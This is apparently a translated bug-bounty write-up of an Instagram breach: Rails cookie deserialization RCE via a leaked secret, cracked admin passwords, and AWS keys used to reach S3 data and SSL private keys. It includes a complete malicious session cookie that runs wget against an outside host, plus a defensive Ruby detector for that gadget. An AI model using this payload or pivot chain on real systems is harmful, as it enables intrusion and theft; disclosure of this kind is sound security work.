I am the trumpet

http://exfiltrated.com/research-Instagram-RCE.php

0x00 Preface


In 2012, Bloomberg famously quoted a post on the website of Facebook's White Hat rewards program: "If Facebook had a $1 million bug, we'd be willing to pay for it." Before I start, I'd like to apologize for the clickbait headline, but that Facebook remark is important background for this article. After a lot of trial and error, I did find a $1 million Instagram bug that could be used to get Instagram source code, photos, SSL certificates, etc.

0x01 The perfect clue


Last year I did some small security tests with some success, so I was very interested in testing the security of Facebook's business as a whole in depth. I discovered this bug thanks to the fact that my employer allows me to look for vulnerabilities in other companies outside of working hours; otherwise there would have been no article at all. Here's how it started: a friend of mine mentioned a while ago that he was testing the security of Instagram, a key component of Facebook's bug bounty program. He found a vulnerable Ruby server at Instagram (sensu.instagram.com), which he told me he had submitted to Facebook's vulnerability response team under the "internal admin interface exposed externally" category. In his report to Facebook he said there might be a Ruby password reset bug that an attacker could use to log into the admin interface, although he had not managed to confirm his suspicion. Seeing the details of the hole, my first thought was CVE-2013-3221 (ronin-ruby.github.io/blog/2013/0…). Since he had already submitted the bug, my friend asked me privately to help him see whether it could be exploited further, amplifying the vulnerability to reach Instagram's core data.

0x02 Ruby (Rails) remote command execution


Based on the details of my friend's bug report, I tried to find a bug that could reset the password of this Ruby application. My initial tests didn't go well, though. The ordinary login page didn't accept the value '0' as a password, and I had no way to trigger a password reset email. I realized that Instagram was probably running the open source Sensu monitoring system behind this, so I googled "sensu-admin" and found nothing useful. Well, it looked like my friend's theory didn't work.

To my surprise, I then found the source code of the app on GitHub. In the project directory I found the Rails secret key leaked in secret_token.rb. My first thought was: would Facebook's programmers really be careless enough to deploy their own backend application without changing the secret? But it was worth a try, because if it worked I could forge session cookies and log into the admin interface. As I mentioned above regarding CVE-2013-3221 (ronin-ruby.github.io/blog/2013/0…), the post's author points out that not only can cookies be forged, but because of the Rails session cookie deserialization vulnerability, an attacker can go directly to remote code execution.

Before trying the deserialization vulnerability against Instagram's systems, I first tested it locally, using the following test framework: github.com/charliesome…

Surprisingly, I managed to reproduce the bug locally without trouble. So, using the same steps, combined with the secret I had just found on GitHub, I sent the following cookie to Instagram's sensu-admin backend server:

_sensu-admin_session=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIkFldmFsKCdzeXN0ZW0oIndnZXQgaHR0cDovL2V4ZmlsdHJhdGVkLmNvbS90ZXN0LWluc3RhZ3JhbSIpJykGOgZFVDoMQG1ldGhvZDoLcmVzdWx0--92c614a28526d03a1a31576bf4bb4c6026ef5e1f

With this carefully constructed cookie, Instagram's server executed the command I sent, which decodes to:

"wget http://exfiltrated.com/test-instagram"
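The two conditions behind this attack (a leaked secret_token and a Rails 3 cookie store that deserializes whatever the cookie contains) can be checked for from the defending side. The following Ruby script is an added example, not code from the original post: it verifies a cookie's HMAC-SHA1 signature the way Rails 3 does, and lists the classes inside a Marshal session payload by scanning bytes rather than calling Marshal.load, so a web application or a log review can flag cookies carrying the DeprecatedInstanceVariableProxy/ERB gadget. The secret and the benign session are constructed; the suspicious sample is the cookie shown above.

```ruby
require 'base64'
require 'openssl'

# Classes a legitimate session hash never contains; seeing them marshaled in a
# cookie means someone is trying the Rails 3.x deserialization gadget.
GADGET_CLASSES = %w[ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy ERB].freeze

# Rails 3 cookie store format: "<base64 Marshal payload>--<hex HMAC-SHA1>".
def split_cookie(value)
  data, digest = value.split('--', 2)
  raise ArgumentError, 'not a signed Rails cookie' if digest.nil?
  [data, digest]
end

# Same computation as ActiveSupport::MessageVerifier: HMAC-SHA1(secret, data).
# A cookie that validates under a secret found on GitHub proves the secret has leaked.
def signature_valid?(value, secret)
  data, digest = split_cookie(value)
  expected = OpenSSL::HMAC.hexdigest('SHA1', secret, data)
  return false unless expected.bytesize == digest.bytesize
  expected.bytes.zip(digest.bytes).reduce(0) { |acc, (a, b)| acc | (a ^ b) }.zero?
end

# Collect the class name of every marshaled object ("o:" + short length + name)
# by scanning raw bytes. Never Marshal.load untrusted data: loading IS the exploit.
def marshaled_classes(value)
  raw = Base64.decode64(split_cookie(value).first)
  return [] unless raw.start_with?("\x04\x08".b) # Marshal 4.8 header
  names = []
  pos = 0
  while (pos = raw.index('o:'.b, pos))
    len = raw.getbyte(pos + 2).to_i - 5 # lengths 1..122 are stored as n+5
    names << raw[pos + 3, len] if len.between?(1, 122)
    pos += 3
  end
  names.uniq
end

def gadget_cookie?(value)
  classes = marshaled_classes(value)
  GADGET_CLASSES.any? { |c| classes.include?(c) }
end

# Constructed sample: a normal Rails 3 session signed with a constructed secret.
SECRET = 'constructed-secret-token-not-from-the-article'
BENIGN_DATA = Base64.strict_encode64(Marshal.dump({ 'session_id' => 'abc123' }))
BENIGN_COOKIE = "#{BENIGN_DATA}--#{OpenSSL::HMAC.hexdigest('SHA1', SECRET, BENIGN_DATA)}"
# The cookie from the write-up above (signed with the leaked secret, which is not reproduced here).
WRITEUP_COOKIE = 'BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5j' \
                 'ZW86CEVSQgY6CUBzcmNJIkFldmFsKCdzeXN0ZW0oIndnZXQgaHR0cDovL2V4ZmlsdHJhdGVkLmNvbS90ZXN0LWluc3RhZ3JhbSIp' \
                 'JykGOgZFVDoMQG1ldGhvZDoLcmVzdWx0--92c614a28526d03a1a31576bf4bb4c6026ef5e1f'
```

Running gadget_cookie? on the write-up cookie returns true with both gadget classes listed, while the constructed session returns false and only validates under its own secret.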

So I set up a listener and uploaded a remote shell, with the following result:

After I got the Instagram server to execute the commands I sent, I reported the bug to the Facebook team. As I noted in my report:

  1. The sensu-admin service used by Facebook uses a secret key that is publicly available on the web.
  2. sensu.instagram.com runs Rails 3.x, which has a remote code execution vulnerability.

0x03 Fatal weak passwords


Actually, for me, finding remote code execution isn't that exciting in itself. But I wanted to make sure I was still covered by Facebook's bug bounty program, so I went back to the program's instructions. They state that while Facebook strongly discourages testing that disrupts the business, the response team is interested in knowing whether testers can reach more sensitive core data. Reading this, I judged that my penetration testing was still within the scope of what Facebook permits.

As mentioned in the previous section, although I managed to get the server to execute remote code and obtained a shell, I did not yet have access to the backend's UI. As it happened, the Instagram backend stored its admin user data in a Postgres database on the same server, so I was able to retrieve the usernames and password hashes of about 60 backend accounts. The passwords were hashed, and while I was working out how to recover them, here's the good news: I quickly cracked 12 weak passwords, including "changeme", "password" and "instagram". My god, those are weak passwords. So I logged on to the sensu.instagram.com admin interface.

Since Facebook strongly opposes business-disrupting testing, I took a screenshot and left, submitting it to Facebook's response team as a new vulnerability.

0x04 Penetrating the intranet


In my first bug report email, I asked the Facebook team whether I could get authorization to move further into the network. Because this sensu-admin server runs on EC2, its /etc/hosts file listed records for some 1,400 systems, large and small. That meant I had a good chance of getting much deeper into Instagram.

Facebook didn't give me a clear answer, though. They did respond quickly by restricting external access to sensu.instagram.com. So what further penetration of the network would have yielded will remain a mystery forever.

0x05 The golden key


In fact, at this point I was pretty happy with the whole engagement. I had found three solid Instagram bugs, two of which I had packaged up and submitted to Facebook. Of course, the story doesn't end there. While going through sensu.instagram.com, I found a file on the server: /etc/sensu/config.json

This configuration file contains authentication credentials for the database and other services, including an email account and a bunch of PagerDuty keys. Naturally, I focused on the AWS key pair also listed in the file, which I expected to be the next breakthrough point.

AWS keys can be used as credentials for many different AWS services, but my focus was on whether these keys could access Amazon's S3 storage service, which would mean a lot of sensitive data was reachable. Using the keys from this configuration file, I found 82 different S3 buckets. However, direct access to their contents was denied: I could list the bucket names but not read the objects inside. One exception was a bucket named autoscale-kitchen.

When I saw the name autoscale-kitchen, my first thought was that this was a development server. In it I found a service deployment archive called autoscale-kitchen-latest.tar.gz, along with its previous iterations. I first looked into the latest version for leaked sensitive information and was disappointed. I then looked at a few older versions, and luckily, in one of them, I found a Vagrant configuration file containing Instagram's EC2 key pair.

Using the key pair I had just found, I successfully connected to Instagram's S3 storage, and this time I could read the contents of every bucket!

0x06 Mastering the empire


With access to Instagram's data on S3, I scanned and downloaded the contents of several buckets.

The next day, I started looking at the data I had downloaded. It contained pictures uploaded by users, text they had posted, and so on. Because Facebook's bug bounty program limits access to sensitive data, I stopped any further digging into user data. However, I am sure that if one kept pulling data, much more sensitive data could be obtained.

Using the AWS key pair, I got the following from several other buckets:

Instagram.com statistics, the source code of multiple backend services, and, more importantly, SSL certificates and a number of private keys for Instagram.com's private APIs, *.instagram.com and Instagram's other web services. Quite literally, I now had the ability to do anything I wanted to anyone on Instagram.

Once again, I submitted a report to Facebook on seven different security issues, big and small, including:

  1. With AWS credentials, any unauthorized user can log into the Sensu management system.
  2. AWS buckets store credentials that grant access to other buckets and can be used for privilege escalation.
  3. Sensitive data is not isolated, so a single AWS key can access all S3 buckets.
  4. The AWS keys can be used from any external IP address; an attacker who is also able to clear the server logs could not be identified after an attack.

0x07 Afterword


Finally, I'd like to summarize my penetration of the Instagram empire with a mind map:

It started with a remote code execution bug at sensu.instagram.com, and from that bug I found weak passwords for backend staff. Through the configuration file on the sensu.instagram.com server I obtained an AWS key pair. Using that key pair, I read the EC2 AWS key pair from S3. Using the latter, I was able to access all of Instagram's important sensitive data stored on S3. The whole penetration test revealed a number of flaws in Facebook's security architecture, and I was surprised to see so many low-level security and governance issues emerge after so many years of security architecture work. Clearly, attack and defense in security continue to move in an ever deeper direction.

[original link] exfiltrated.com/research-In…